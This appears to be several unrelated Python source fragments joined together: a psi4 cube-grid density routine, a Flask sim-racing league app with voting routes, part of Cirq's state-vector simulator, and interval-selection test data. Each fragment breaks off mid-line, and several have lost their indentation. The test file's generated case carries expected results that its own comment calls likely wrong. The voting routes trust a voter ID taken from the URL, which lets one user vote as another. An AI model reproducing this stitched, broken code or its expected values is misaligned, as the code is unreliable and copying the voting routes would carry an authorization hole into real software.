    # Loop over the blocks
    offset = 0
    for i in range(len(block)):
        # Obtain block information
        this_block = block[i]
        points.compute_points(this_block)
        n_points = this_block.npoints()
        lpos = this_block.functions_local_to_global()
        offset += n_points

        # Compute phi!
        phi = np.array(points.basis_values()["PHI"])[:n_points, :len(lpos)]

        # Take the local slice of the coefficient vector for this block.
        lD = array[lpos]

        # Contract basis values with local coefficients: v_p = sum_m phi_pm c_m
        v[offset - n_points:offset] = np.einsum('pm,m->p', phi, lD)
        x[offset - n_points:offset] = this_block.x().np
        y[offset - n_points:offset] = this_block.y().np
        z[offset - n_points:offset] = this_block.z().np
        w[offset - n_points:offset] = this_block.w().np
    return v, [x, y, z, w]
def add_density_matrix_basis(npoints, points, block, matrix):
    """
    Computes the density on the grid from a one-particle density matrix.

    Parameters
    ----------
    npoints : int
        total number of points
    points : psi4.core.RKSFunctions
    block : list
        Set of psi4.core.BlockOPoints for cube grid
    matrix : numpy array
        One-particle density matrix

    Returns
    -------
    v : numpy array
        Array with density values on the grid
    [x, y, z, w] : list of numpy arrays
        Grid coordinates and quadrature weights, block-ordered like v
    """
    v = np.zeros(int(npoints))
    x = np.zeros(int(npoints))
    y = np.zeros(int(npoints))
    z = np.zeros(int(npoints))
    w = np.zeros(int(npoints))

    psi_matrix = psi4.core.Matrix.from_array(matrix)
    points.set_pointers(psi_matrix)
    # RHO_A is a live buffer overwritten by each compute_points call below.
    rho = points.point_values()["RHO_A"]

    offset = 0
    for i in range(len(block)):
        points.compute_points(block[i])
        n_points = block[i].npoints()
        offset += n_points
        # Factor 0.5 halves the evaluated density — presumably RHO_A holds the
        # total (doubly-occupied) density here; TODO confirm against the ansatz.
        v[offset - n_points:offset] = 0.5 * rho.np[:n_points]
        x[offset - n_points:offset] = block[i].x().np
        y[offset - n_points:offset] = block[i].y().np
        z[offset - n_points:offset] = block[i].z().np
        w[offset - n_points:offset] = block[i].w().np
    return v, [x, y, z, w]
def compute_isocontour_range(v, npoints):
    """
    Computes the isocontour values enclosing a fixed fraction of the field.

    Walks the grid values in descending order, accumulating |value| weight
    until `cumulative_threshold` of the total weight is enclosed; the last
    positive and negative values seen become the isocontour bounds.

    Parameters
    ----------
    v : numpy array
        Array with scalar values on the grid
    npoints : int
        Total number of points on the grid

    Returns
    -------
    values : list
        Value of positive and negative isocontour
    cumulative_threshold : float
        The weight fraction used (0.85)
    """
    cumulative_threshold = 0.85

    # Weight each point by |value| (replaces the pointless np.power(|v|, 1.0)
    # and the manual per-point accumulation loop).
    grid_values = np.asarray(v[:int(npoints)], dtype=float)
    weights = np.abs(grid_values)
    sum_weight = weights.sum()

    # Sort points by value, descending.
    order = np.argsort(grid_values)[::-1]
    sorted_values = grid_values[order]
    sorted_weights = weights[order]

    # Determine the positive and negative bounds. ('cumulative' replaces a
    # local that shadowed the builtin `sum`.)
    cumulative = 0.0
    negative_isocontour = 0.0
    positive_isocontour = 0.0
    for weight, value in zip(sorted_weights, sorted_values):
        if value >= 0:
            positive_isocontour = value
        else:
            negative_isocontour = value
        cumulative += weight / sum_weight
        if cumulative > cumulative_threshold:
            break
    return [positive_isocontour, negative_isocontour], cumulative_threshold
def write_cube_file(wfn, O, N, D, nxyz, npoints, v, name, header):
# Reorder the grid
v2 = np.zeros_like(v)
offset = 0
for istart in range(0, int(N[0] + 1), nxyz):
ni = int(N[0]) - istart if istart + nxyz > N[0] else nxyz
for jstart in range(0, int(N[1] + 1), nxyz):
nj = int(N[1]) - jstart if jstart + nxyz > N[1] else nxyz
for kstart in range(0, int(N[2] + 1), nxyz):
nk = int(N[2]) - kstart if kstart + nxyz > N[2] else nxyz
for i in range(istart, istart + ni):
for j in range(jstart, jstart + nj):
for k in range(kstart, kstart + nk):
index = i * (N[1]) | |
DESCENDING)])
#pprint(driver)
#pprint(user)
if not season_driver:
season_driver = {'top10': {
'1': 0, '2': 0, '3': 0},
'points': 'TBD',
'incidents': 0,
'pole': 0,
'unique_name': "",
'races_done': 0
}
season_driver['top10']['1'] = 0
season_driver['top10']['2'] = 0
season_driver['top10']['3'] = 0
season_driver['classimg'] = ''
if not driver:
driver = {'top10': {
'1': 0, '2': 0, '3': 0},
'points': 'TBD',
'incidents': 0,
'pole': 0,
'unique_name': "",
'races_done': 0
}
driver['top10']['1'] = 0
driver['top10']['2'] = 0
driver['top10']['3'] = 0
driver['classimg'] = ''
else:
driver['signedin'] = datetime.fromtimestamp(int(user['email_confirmed_on'])).strftime('%d-%m-%Y')
driver['first'] = driver['top10']['1']
driver['top3'] = int(driver['top10']['1']) + int(driver['top10']['2']) + int(driver['top10']['3'])
if 'incident_ave' in driver:
driver['incidents'] = round((float(driver['incident_ave'])), 3)
#print('round', round((float(driver['incident_ave'])), 3))
else:
driver['incidents'] = round((float(driver['incidents'] / driver['races_done'])), 3)
#print('round', driver['incidents'])
#print(driver['incidents'])
driver['classimg'] = driver['classimg']
if (type(driver['points']) == str):
driver['points'] = 'TBD'
else:
try:
driver['points'] = round(int(driver['points'], 3)) * 1000
except:
driver['points'] = round(driver['points'], 3) * 1000
#global data
top10list = []
ratinglabels = ['start']
ratingvalues = [0]
ratingrange = [0]
incidentlabels = ['start']
incidentvalues = [0]
incidentaverage = [0]
rankposition = [0]
ranklabels = ['start']
racenum = 0
racesList = []
if (driver['races_done'] > 0):
for k, v in driver['top10'].items():
top10list.append(v)
top10list.append(driver['pole'])
name = driver['unique_name']
hist_rating = db.HistRating.find({'result.steamID':user['steam_id']})
for rating in hist_rating:
if (hist_rating.count() > 4):
ratinglabels.append(rating['filename'])
result = rating['result']
for res in result:
if (res['steamID'] == user['steam_id']):
if (res['points'] <= 0):
ratingvalues.append(float(0))
ratingrange.append(float(0))
else:
ratingvalues.append(round(res['points']*1000, 2))
ratingrange.append(round((3* res['sigma'] + res['points']) * 1000))
hist_incidents = db.HistIncident.find({'result.steamID':user['steam_id']})
histlist = [0]
'''for incident in hist_incidents:
incidentlabels.append(incident['filename'])
incresult = incident['result']
for inc_res in incresult:
if (inc_res['steamID'] == user['steam_id']):
incidentvalues.append(round(inc_res['incidents'], 2))
racenum += 1
incidentaverage.append(round(inc_res['incidents'] / racenum, 2))'''
for incident in hist_incidents:
incidentlabels.append(incident['filename'])
incresult = incident['result']
for inc_res in incresult:
if (inc_res['steamID'] == user['steam_id']):
incidentvalues.append(round(inc_res['raceincidents'], 2))
histlist.append(inc_res['raceincidents'])
for hi in range(len(histlist)):
if hi < 5 and hi > 0:
incsum = sum(histlist[0:hi])
#print('0', hi, incsum)
incidentaverage.append(round(incsum/hi, 2))
elif hi == 0:
pass
else:
botsum = hi - 4
incsum = sum(histlist[botsum:hi+1])/5
#print(botsum, hi, incsum)
incidentaverage.append(round(incsum, 2))
hist_rank = db.HistRank.find()
for rank in hist_rank:
length = len(rank['positions'])
#id_in = False
for i in range(length):
if rank['positions'][i]['steamID'] == user['steam_id']:
ranklabels.append(rank['filename'])
#id_in = True
rankposition.append(rank['positions'][i]['rank_pos'])
#print(rankposition)
ranklabels_len= len(ranklabels)
ranklabels = ranklabels[ranklabels_len//3:]
rankposition = rankposition[ranklabels_len//3:]
#season data
seasontop10list = []
seasonratingvalues = []
seasonratingrange = []
seasonlabels = ['start']
seasonrankposition = []
seasonranklabels = ['start']
if season_driver['races_done'] > 0:
for k, v in season_driver['top10'].items():
seasontop10list.append(v)
seasontop10list.append(season_driver['pole'])
season_hist_rating = db.SeasonHistRating.find({'result.steamID':user['steam_id']})
for rating in season_hist_rating:
seasonlabels.append(rating['filename'])
season_hist_rank = db.SeasonHistRank.find()
for rank in season_hist_rank:
seasonranklabels.append(rank['filename'])
for label in ratinglabels:
if label in seasonlabels and label != 'start':
season_race = db.SeasonHistRating.find_one({'filename':label})['result']
for res in season_race:
if res['steamID'] == user['steam_id']:
if res['points'] <= 0:
seasonratingvalues.append(float(0))
seasonratingrange.append(float(0))
else:
seasonratingvalues.append(round(res['points']*1000, 2))
seasonratingrange.append(round((3* res['sigma'] + res['points']) * 1000))
else:
seasonratingvalues.append(float(0))
seasonratingrange.append(float(0))
for label in ranklabels:
if label in seasonranklabels and label != 'start':
season_rank = db.SeasonHistRank.find_one({'filename':label})['positions']
for pos in season_rank:
if pos['steamID'] == user['steam_id']:
seasonrankposition.append(pos['rank_pos'])
else:
seasonrankposition.append(0)
#print(incidentaverage)
#user = dbusers.users.find_one({'_id': userid})
#print(user)
try:
form.phrase.data = user['phrase']
form.about.data = user['about']
form.name.data = user['name']
form.lastname.data = user['lastname']
form.city.data = user['city']
form.gender.data = user['gender']
form.state.data = user['state']
form.birthday.data = datetime.strptime(user['birthday'], '%d-%m-%Y')
except:
pass
return render_template('user-single.html',formuploadphoto=formuploadphoto, form=form, user=user,
top10list=top10list, ratingrange=ratingrange, incidentaverage=incidentaverage,
incidentlabels=incidentlabels, incidentvalues=incidentvalues, userid=userid,
driver=driver, ratinglabels = ratinglabels, ratingvalues=ratingvalues,
rankposition=rankposition, ranklabels=ranklabels, c_user=c_user, seasontop10list=seasontop10list,
seasonratingvalues=seasonratingvalues, seasonratingrange=seasonratingrange, seasonrankposition=seasonrankposition)
@application.route('/agenda')
@login_required
def agenda():
    """Render the race agenda, flagging races that open within 30 minutes.

    Fix: removed an unused `driver` lookup (a dead db.Drivers query per
    request); renamed the local so it no longer shadows the view function.
    """
    user = current_user.user_obj()
    tz = pytz.timezone('Brazil/East')
    now = datetime.now(tz)
    scheduled = list(db.ScheduledRace.find().sort([('timestamp_start', 1)]))
    for race in scheduled:
        start = tz.localize(datetime.strptime(race['date'] + ' ' + race['time'], '%d-%m-%Y %H:%M'))
        # A race is "open" (joinable) from 30 minutes before its start time.
        race['open'] = start - now < timedelta(0, 1800)
    return render_template('agenda.html', agenda=scheduled, user=user)
@application.route('/raceresult/<raceid>')
@login_required
def raceresult(raceid):
    """Render a single race result page with per-driver rank deltas.

    Falls back to zero deltas when no ranking history exists for the race.
    Fixes: removed leftover debug print() calls; narrowed the bare excepts
    (find_one returning None raises TypeError; missing keys raise KeyError).
    """
    voters = db.ResultVote.find_one({'resultid': ObjectId(raceid)})
    user = current_user.get_id()
    username = current_user.get_username()
    result = db.RaceResult.find_one({'_id': ObjectId(raceid)})

    try:
        delta = db.HistRank.find_one({'filename': result['racefilename']})['positions']
    except (TypeError, KeyError):
        # No ranking history for this race: give every driver a zero delta.
        delta = [{'steamID': res['steamID'], 'delta': 0} for res in result['race']]

    for entry in result['race']:
        for de in delta:
            if de['steamID'] == entry['steamID']:
                # History entries may lack a 'delta' key; default to 0.
                entry['delta'] = de.get('delta', 0)
        if 'delta' not in entry:
            entry['delta'] = 0

    return render_template('raceresult.html', result=result, practice=result['practice'],
                           qualify=result['qualify'], race=result['race'], user=user,
                           username=username, voters=voters, raceid=raceid)
@application.route('/upvote/<resultid>/<voterid>/<userid>')
@login_required
def upvote(resultid, voterid, userid):
    """Record (or retract) voter `voterid`'s recommendation for driver `userid`.

    Rules enforced below: a voter cannot vote for themselves; both voter and
    voted driver must appear in the race result; each voter has exactly one
    upvote per race (upvoting the same driver again retracts it); an upvote
    cancels the voter's downvote for that driver. Driver vote totals are kept
    in sync in db.Drivers. Always redirects back to the result page with a
    flash message describing the outcome.
    """
    # Was the voter a participant in this race?
    result = db.RaceResult.find_one({'_id': ObjectId(resultid),
                                     'race.userid': voterid})
    voteruser = dbusers.users.find_one({'_id': voterid})
    user = dbusers.users.find_one({'_id': userid})
    username = voteruser['username']
    votedict = {'voterid': voterid,
                'userid': userid,
                'username': username}
    user_steamid = user['steam_id']
    if voterid == userid:
        # check if user is trying to vote himself/herself
        flash('Recomendação não computada pois você não pode votar em si mesmo')
        return redirect(url_for('raceresult', raceid=resultid))
    if not result:
        # check if the voter was participating in the race
        flash('Recomendação não computada pois ' + current_user.get_username() + ' não participou da corrida!')
        return redirect(url_for('raceresult', raceid=resultid))
    # Check if the voted id is really in the result
    result = db.RaceResult.find_one({'_id': ObjectId(resultid),
                                     'race.userid': userid})
    if not result:
        flash('Recomendação não computada pois o piloto em que você votou parece não ter participado da corrida!')
        return redirect(url_for('raceresult', raceid=resultid))

    votedoc = db.ResultVote.find_one({'resultid': ObjectId(resultid)})
    # CHECK IF A VOTING DOCUMENT IS ALREADY WRITTEN FOR THE RESULT
    if votedoc:
        # Here the document already exists, so we update it!
        votelist = votedoc['upvote']
        downvotelist = votedoc['downvote']
        # Each user has ONE upvote for the race,
        # now we check if the user have already voted for any driver
        votetwice = False
        for item in votedoc['upvote']:
            if item['voterid'] == voterid:
                votetwice = True  # yes, he voted for some driver!
        # Now we check if the voter have already voted in the same driver
        vote = False
        if votedict in votelist:
            vote = True
        # After checking, we update the Document
        if votetwice == False:
            # The voter didnt vote in any driver
            # we input his vote! (an upvote also cancels an existing downvote)
            votelist.append(votedict)
            if votedict in downvotelist:
                downvotelist.remove(votedict)
            db.ResultVote.update_one({'resultid': ObjectId(resultid)}, {'$set': {'upvote': votelist,
                                                                                'downvote': downvotelist}})
            db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': 1}})
            flash('Recomendação computada')
        else:
            # The voter have voted before,
            # if he is voting in the same driver, we take the vote out (toggle)
            if vote:
                votelist.remove(votedict)
                db.ResultVote.update_one({'resultid': ObjectId(resultid)}, {'$set': {'upvote': votelist}})
                db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': -1}})
                flash('Recomendação retirada!')
            # The voter has already voted for a different driver: reject
            elif votetwice:
                flash('Recomendação não computada pois você não pode recomendar mais de um piloto')
                return redirect(url_for('raceresult', raceid=resultid))
    else:
        # Here the doc doesnt exist, so we create it
        db.ResultVote.insert_one({'resultid': ObjectId(resultid),
                                  'upvote': [votedict],
                                  'downvote': []})
        db.Drivers.update_one({'steamID': user_steamid}, {'$inc': {'votes': 1}})
        flash('Recomendação computada')
    return redirect(url_for('raceresult', raceid=resultid))
@application.route('/downvote/<resultid>/<voterid>/<userid>')
@login_required
def downvote(resultid, voterid, userid):
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': voterid})
username = dbusers.users.find_one({'_id': voterid})['username']
votedict = {'voterid': voterid,
'userid': userid,
'username': username}
if voterid == userid:
#check if user is trying to vote himself/herself
flash('Contra-indicação não computada pois você não pode votar em si mesmo')
#print('Votar em si mesmo')
return redirect(url_for('raceresult', raceid=resultid))
if not result:
#check if the voter was participating in the race
flash('Contra-indicação não computada pois ' + current_user.get_username() + ' não participou da corrida!')
#print('Votante não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
#Check if the voted id is really in the result
result = db.RaceResult.find_one({'_id': ObjectId(resultid),
'race.userid': userid})
if not result:
flash('Contra-indicação não computada pois parece que o piloto não indicado não participou da corrida!')
#print('Votado não participou da corrida')
return redirect(url_for('raceresult', raceid=resultid))
votedoc = db.ResultVote.find_one({'resultid': ObjectId(resultid)})
#CHECK IF A VOTING DOCUMENT IS ALREADY WRITTEN FOR THE RESULT
if votedoc:
#Here the document already exists, so we update it
downvotelist = votedoc['downvote']
votelist = votedoc['upvote']
#Each user has ONE upvote for the race,
#now we check if the user have already voted for any driver
votetwice = False
for item in votedoc['downvote']:
if item['voterid'] == voterid:
votetwice = | |
<reponame>augustehirth/Cirq<gh_stars>0
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Objects and methods for acting efficiently on a state vector."""
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, TYPE_CHECKING, Type, Union
import numpy as np
from cirq import _compat, linalg, protocols, qis, sim
from cirq._compat import proper_repr
from cirq.sim.act_on_args import ActOnArgs, strat_act_on_from_apply_decompose
from cirq.linalg import transformations
if TYPE_CHECKING:
import cirq
from numpy.typing import DTypeLike
class _BufferedStateVector(qis.QuantumStateRepresentation):
"""Contains the state vector and buffer for efficient state evolution."""
def __init__(self, state_vector: np.ndarray, buffer: Optional[np.ndarray] = None):
"""Initializes the object with the inputs.
This initializer creates the buffer if necessary.
Args:
state_vector: The state vector, must be correctly formatted. The data is not checked
for validity here due to performance concerns.
buffer: Optional, must be same shape as the state vector. If not provided, a buffer
will be created automatically.
"""
self._state_vector = state_vector
if buffer is None:
buffer = np.empty_like(state_vector)
self._buffer = buffer
self._qid_shape = state_vector.shape
@classmethod
def create(
cls,
*,
initial_state: Union[np.ndarray, 'cirq.STATE_VECTOR_LIKE'] = 0,
qid_shape: Optional[Tuple[int, ...]] = None,
dtype: Optional['DTypeLike'] = None,
buffer: Optional[List[np.ndarray]] = None,
):
"""Initializes the object with the inputs.
This initializer creates the buffer if necessary.
Args:
initial_state: The density matrix, must be correctly formatted. The data is not
checked for validity here due to performance concerns.
qid_shape: The shape of the density matrix, if the initial state is provided as an int.
dtype: The dtype of the density matrix, if the initial state is provided as an int.
buffer: Optional, must be length 3 and same shape as the density matrix. If not
provided, a buffer will be created automatically.
Raises:
ValueError: If initial state is provided as integer, but qid_shape is not provided.
"""
if not isinstance(initial_state, np.ndarray):
if qid_shape is None:
raise ValueError('qid_shape must be provided if initial_state is not ndarray')
state_vector = qis.to_valid_state_vector(
initial_state, len(qid_shape), qid_shape=qid_shape, dtype=dtype
).reshape(qid_shape)
else:
if qid_shape is not None:
state_vector = initial_state.reshape(qid_shape)
else:
state_vector = initial_state
if np.may_share_memory(state_vector, initial_state):
state_vector = state_vector.copy()
state_vector = state_vector.astype(dtype, copy=False)
return cls(state_vector, buffer)
def copy(self, deep_copy_buffers: bool = True) -> '_BufferedStateVector':
"""Copies the object.
Args:
deep_copy_buffers: True by default, False to reuse the existing buffers.
Returns:
A copy of the object.
"""
return _BufferedStateVector(
state_vector=self._state_vector.copy(),
buffer=self._buffer.copy() if deep_copy_buffers else self._buffer,
)
def kron(self, other: '_BufferedStateVector') -> '_BufferedStateVector':
"""Creates the Kronecker product with the other state vector.
Args:
other: The state vector with which to kron.
Returns:
The Kronecker product of the two state vectors.
"""
target_tensor = transformations.state_vector_kronecker_product(
self._state_vector, other._state_vector
)
return _BufferedStateVector(
state_vector=target_tensor,
buffer=np.empty_like(target_tensor),
)
def factor(
self, axes: Sequence[int], *, validate=True, atol=1e-07
) -> Tuple['_BufferedStateVector', '_BufferedStateVector']:
"""Factors a state vector into two independent state vectors.
This function should only be called on state vectors that are known to be separable, such
as immediately after a measurement or reset operation. It does not verify that the provided
state vector is indeed separable, and will return nonsense results for vectors
representing entangled states.
Args:
axes: The axes to factor out.
validate: Perform a validation that the state vector factors cleanly.
atol: The absolute tolerance for the validation.
Returns:
A tuple with the `(extracted, remainder)` state vectors, where `extracted` means the
sub-state vector which corresponds to the axes requested, and with the axes in the
requested order, and where `remainder` means the sub-state vector on the remaining
axes, in the same order as the original state vector.
"""
extracted_tensor, remainder_tensor = transformations.factor_state_vector(
self._state_vector, axes, validate=validate, atol=atol
)
extracted = _BufferedStateVector(
state_vector=extracted_tensor,
buffer=np.empty_like(extracted_tensor),
)
remainder = _BufferedStateVector(
state_vector=remainder_tensor,
buffer=np.empty_like(remainder_tensor),
)
return extracted, remainder
def reindex(self, axes: Sequence[int]) -> '_BufferedStateVector':
"""Transposes the axes of a state vector to a specified order.
Args:
axes: The desired axis order.
Returns:
The transposed state vector.
"""
new_tensor = transformations.transpose_state_vector_to_axis_order(self._state_vector, axes)
return _BufferedStateVector(
state_vector=new_tensor,
buffer=np.empty_like(new_tensor),
)
def apply_unitary(self, action: Any, axes: Sequence[int]) -> bool:
"""Apply unitary to state.
Args:
action: The value with a unitary to apply.
axes: The axes on which to apply the unitary.
Returns:
True if the operation succeeded.
"""
new_target_tensor = protocols.apply_unitary(
action,
protocols.ApplyUnitaryArgs(
target_tensor=self._state_vector,
available_buffer=self._buffer,
axes=axes,
),
allow_decompose=False,
default=NotImplemented,
)
if new_target_tensor is NotImplemented:
return False
self._swap_target_tensor_for(new_target_tensor)
return True
def apply_mixture(self, action: Any, axes: Sequence[int], prng) -> Optional[int]:
"""Apply mixture to state.
Args:
action: The value with a mixture to apply.
axes: The axes on which to apply the mixture.
prng: The pseudo random number generator to use.
Returns:
The mixture index if the operation succeeded, otherwise None.
"""
mixture = protocols.mixture(action, default=None)
if mixture is None:
return None
probabilities, unitaries = zip(*mixture)
index = prng.choice(range(len(unitaries)), p=probabilities)
shape = protocols.qid_shape(action) * 2
unitary = unitaries[index].astype(self._state_vector.dtype).reshape(shape)
linalg.targeted_left_multiply(unitary, self._state_vector, axes, out=self._buffer)
self._swap_target_tensor_for(self._buffer)
return index
    def apply_channel(self, action: Any, axes: Sequence[int], prng) -> Optional[int]:
        """Apply channel to state.

        Samples one Kraus operator of the channel with probability
        proportional to the squared norm of the resulting state, applies
        it, and renormalizes the state in place.

        Args:
            action: The value with a channel to apply.
            axes: The axes on which to apply the channel.
            prng: The pseudo random number generator to use.
        Returns:
            The kraus index if the operation succeeded, otherwise None.
        """
        kraus_operators = protocols.kraus(action, default=None)
        if kraus_operators is None:
            return None
        def prepare_into_buffer(k: int):
            # Writes K_k |psi> into the scratch buffer; the state itself
            # is left untouched.
            linalg.targeted_left_multiply(
                left_matrix=kraus_tensors[k],
                right_target=self._state_vector,
                target_axes=axes,
                out=self._buffer,
            )
        shape = protocols.qid_shape(action)
        kraus_tensors = [
            e.reshape(shape * 2).astype(self._state_vector.dtype) for e in kraus_operators
        ]
        # Inverse-CDF sampling: subtract each operator's weight
        # (|| K_k |psi> ||^2) from p until it drops below zero.
        p = prng.random()
        weight = None
        fallback_weight = 0
        fallback_weight_index = 0
        index = None
        for index in range(len(kraus_tensors)):
            prepare_into_buffer(index)
            weight = np.linalg.norm(self._buffer) ** 2
            # Track the heaviest operator seen so far as a fallback.
            if weight > fallback_weight:
                fallback_weight_index = index
                fallback_weight = weight
            p -= weight
            if p < 0:
                break
        assert weight is not None, "No Kraus operators"
        if p >= 0 or weight == 0:
            # Floating point error resulted in a malformed sample.
            # Fall back to the most likely case.
            prepare_into_buffer(fallback_weight_index)
            weight = fallback_weight
            index = fallback_weight_index
        # Renormalize the sampled branch and install it as the new state.
        self._buffer /= np.sqrt(weight)
        self._swap_target_tensor_for(self._buffer)
        return index
def measure(
self, axes: Sequence[int], seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None
) -> List[int]:
"""Measures the state vector.
Args:
axes: The axes to measure.
seed: The random number seed to use.
Returns:
The measurements in order.
"""
bits, _ = sim.measure_state_vector(
self._state_vector,
axes,
out=self._state_vector,
qid_shape=self._qid_shape,
seed=seed,
)
return bits
def sample(
self,
axes: Sequence[int],
repetitions: int = 1,
seed: 'cirq.RANDOM_STATE_OR_SEED_LIKE' = None,
) -> np.ndarray:
"""Samples the state vector.
Args:
axes: The axes to sample.
repetitions: The number of samples to make.
seed: The random number seed to use.
Returns:
The samples in order.
"""
return sim.sample_state_vector(
self._state_vector,
axes,
qid_shape=self._qid_shape,
repetitions=repetitions,
seed=seed,
)
def _swap_target_tensor_for(self, new_target_tensor: np.ndarray):
"""Gives a new state vector for the system.
Typically, the new state vector should be `args.available_buffer` where
`args` is this `cirq.ActOnStateVectorArgs` instance.
Args:
new_target_tensor: The new system state. Must have the same shape
and dtype as the old system state.
"""
if new_target_tensor is self._buffer:
self._buffer = self._state_vector
self._state_vector = new_target_tensor
    @property
    def supports_factor(self) -> bool:
        """Whether this state representation supports the `factor` operation."""
        return True
class ActOnStateVectorArgs(ActOnArgs):
"""State and context for an operation acting on a state vector.
There are two common ways to act on this object:
1. Directly edit the `target_tensor` property, which is storing the state
vector of the quantum system as a numpy array with one axis per qudit.
2. Overwrite the `available_buffer` property with the new state vector, and
then pass `available_buffer` into `swap_target_tensor_for`.
"""
@_compat.deprecated_parameter(
deadline='v0.15',
fix='Use classical_data.',
parameter_desc='log_of_measurement_results and positional arguments',
match=lambda args, kwargs: 'log_of_measurement_results' in kwargs or len(args) > 4,
)
@_compat.deprecated_parameter(
deadline='v0.15',
fix='Use initial_state instead and specify all the arguments with keywords.',
parameter_desc='target_tensor and positional arguments',
match=lambda args, kwargs: 'target_tensor' in kwargs or len(args) != 1,
)
def __init__(
self,
target_tensor: Optional[np.ndarray] = None,
available_buffer: | |
import random
def gen_test():
    """Generates a reproducible pseudo-random interval test case.

    A fixed seed is used so repeated calls return identical data.

    Returns:
        A dict with keys:
            'A': list of 1000 (start, end) int pairs with start < end,
            'k': the k parameter of the problem (100),
            'res', 'sol': expected result and solution indices.
                NOTE(review): these two values appear copied from the
                hand-written 100-interval test case below and are almost
                certainly wrong for this generated data -- recompute
                before relying on them.
    """
    n = 1000
    k = 100
    max_end = 1000
    intervals = []
    rng = random.Random(0)  # fixed seed: deterministic output
    for _ in range(n):
        lo = rng.randint(0, max_end)
        hi = rng.randint(0, max_end)
        if lo == hi:
            # Degenerate draw: widen to a unit-length interval.
            intervals.append((lo, lo + 1))
        else:
            intervals.append((min(lo, hi), max(lo, hi)))
    # BUGFIX: the debug `print(x); exit(0)` left here made the `return`
    # unreachable and terminated the whole process; the function now
    # actually returns its test case.
    return {
        'A': intervals,
        'k': k,
        'res': 668,
        'sol': [10, 18, 27, 44, 45, 48, 74, 75, 77, 85]
    }
tests = [
{
'A': [(0, 4), (1, 10), (6, 7), (2, 8)],
'k': 3,
'res': 2,
'sol': [0, 1, 3]
}, {
'A': [(x, x + 2) for x in range(50)],
'k': 2,
'res': 1,
'sol': [0, 1]
}, {
'A': [(x, x + 10) for x in range(150)],
'k': 10,
'res': 1,
'sol': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
}, {
'A': [(100 - 5 * x, 100 + 5 * x) for x in range(15)],
'k': 14,
'res': 10,
'sol': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
},
{
# All start at point 0
'A': [(0, 1), (0, 2), (0, 3), (0, 4), (0, 5)],
'k': 3,
'res': 3,
'sol': [2, 3, 4]
},
{
# k = 1
'A': [(0, 1), (0, 2), (0, 3), (0, 4), (0, 5)],
'k': 1,
'res': 5,
'sol': [4]
},
{
# Smaller intervals are fully contained into longer ones
'A': [(10, 11), (9, 12), (8, 13), (7, 14), (6, 15)],
'k': 3,
'res': 5,
'sol': [2, 3, 4]
},
{'A': [(394, 864), (776, 911), (41, 430), (265, 988), (497, 523), (414, 940), (802, 849), (310, 991), (366, 488),
(597, 913), (223, 929), (142, 516),
(143, 288), (97, 773), (633, 818), (256, 931), (545, 722), (616, 829), (150, 923), (101, 317), (75, 747),
(870, 920), (338, 700), (483, 573),
(103, 362), (323, 444), (625, 655), (209, 934), (565, 989), (453, 488), (533, 886), (63, 266), (824, 940),
(561, 937), (14, 95), (736, 860),
(408, 727), (803, 844), (640, 684), (1, 626), (505, 847), (341, 888), (249, 747), (333, 720), (64, 891),
(195, 939), (227, 581), (244, 822),
(145, 990), (556, 822), (93, 458), (82, 327), (520, 896), (501, 955), (111, 308), (298, 564), (127, 723),
(340, 560), (834, 944), (208, 553),
(818, 986), (560, 617), (294, 601), (93, 455), (610, 817), (324, 394), (247, 589), (188, 297), (193, 841),
(33, 191), (627, 672), (266, 487),
(70, 91), (695, 775), (133, 897), (153, 945), (39, 862), (82, 919), (716, 945), (553, 849), (400, 699),
(722, 857), (282, 537), (534, 831),
(241, 869), (220, 916), (603, 695), (845, 972), (429, 593), (281, 461), (504, 676), (656, 717), (812, 938),
(84, 365), (332, 627), (118, 498),
(601, 645), (343, 865), (194, 248), (16, 749)],
'k': 10,
'res': 668,
'sol': [10, 18, 27, 44, 45, 48, 74, 75, 77, 85]
},
{'A': [(394, 864), (776, 911), (41, 430), (265, 988), (497, 523), (414, 940), (802, 849), (310, 991), (366, 488),
(597, 913), (223, 929), (142, 516),
(143, 288), (97, 773), (633, 818), (256, 931), (545, 722), (616, 829), (150, 923), (101, 317), (75, 747),
(870, 920), (338, 700), (483, 573),
(103, 362), (323, 444), (625, 655), (209, 934), (565, 989), (453, 488), (533, 886), (63, 266), (824, 940),
(561, 937), (14, 95), (736, 860),
(408, 727), (803, 844), (640, 684), (1, 626), (505, 847), (341, 888), (249, 747), (333, 720), (64, 891),
(195, 939), (227, 581), (244, 822),
(145, 990), (556, 822), (93, 458), (82, 327), (520, 896), (501, 955), (111, 308), (298, 564), (127, 723),
(340, 560), (834, 944), (208, 553),
(818, 986), (560, 617), (294, 601), (93, 455), (610, 817), (324, 394), (247, 589), (188, 297), (193, 841),
(33, 191), (627, 672), (266, 487),
(70, 91), (695, 775), (133, 897), (153, 945), (39, 862), (82, 919), (716, 945), (553, 849), (400, 699),
(722, 857), (282, 537), (534, 831),
(241, 869), (220, 916), (603, 695), (845, 972), (429, 593), (281, 461), (504, 676), (656, 717), (812, 938),
(84, 365), (332, 627), (118, 498),
(601, 645), (343, 865), (194, 248), (16, 749), (119, 277), (225, 722), (380, 813), (174, 340), (436, 835),
(63, 103), (149, 801), (714, 875),
(46, 224), (587, 836), (649, 931), (547, 958), (616, 696), (27, 75), (127, 650), (193, 620), (589, 850),
(122, 400), (93, 379), (118, 853),
(37, 620), (22, 199), (984, 993), (189, 735), (126, 490), (215, 744), (62, 819), (695, 959), (23, 557),
(435, 635), (103, 855), (71, 266), (73, 226),
(308, 662), (358, 446), (62, 184), (478, 515), (40, 610), (103, 716), (204, 400), (266, 367), (749, 926),
(481, 858), (923, 940), (173, 583),
(688, 714), (208, 989), (59, 785), (692, 807), (162, 865), (165, 350), (256, 542), (120, 611), (452, 943),
(179, 681), (13, 482), (419, 697),
